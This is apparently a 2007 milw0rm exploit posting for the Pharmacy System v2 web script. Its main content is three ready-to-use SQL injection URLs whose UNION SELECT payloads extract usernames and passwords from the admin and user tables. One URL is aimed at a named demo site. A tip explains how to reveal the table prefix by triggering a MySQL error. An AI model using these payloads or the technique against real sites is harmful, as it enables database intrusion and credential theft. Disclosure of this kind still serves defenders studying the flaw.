Publish Date: 24 Jun 2007
--==+================================================================================+==--
--==+ Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SCRIPT DOWNLOAD: PAY SCRIPT
SITE: http://www.netartmedia.net/pharmacysystem/
DORK: N/A
EXPLOITS:
EXPLOIT 1: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users
EXPLOIT 2: http://www.server.com/SCRIPT_PATH/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_users
EXAMPLES:
EXAMPLE ON DEMO: http://www.wscreator.com/pharma1/index.php?mod=cart&quantity=1&action=add&ID=-1%20and%201=2%20UNION%20ALL%20SELECT%201,2,3,concat(username,password),5,6,7,8,9,10,11%20FROM%20pharma1_admin_users
NOTE/TIP: Most sites will have diffrent table prefix, so table pharma1_admin_users probarly wont exist, to get the prefix
follow these steps, goto "http://server.com/index.php?page='" this should cause a mysql error and you will be able to
see the mysql query being used for the page variable. Simple replace the prefix from the error with then one in the injection
if you cant do that then dont use the exploit.
GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net
--==+================================================================================+==--
--==+ Pharmacy System v2 AND PRIOR SQL INJECTION VULNERBILITYS +==--
--==+================================================================================+==--
# milw0rm.com [2007-06-24]
Vulmon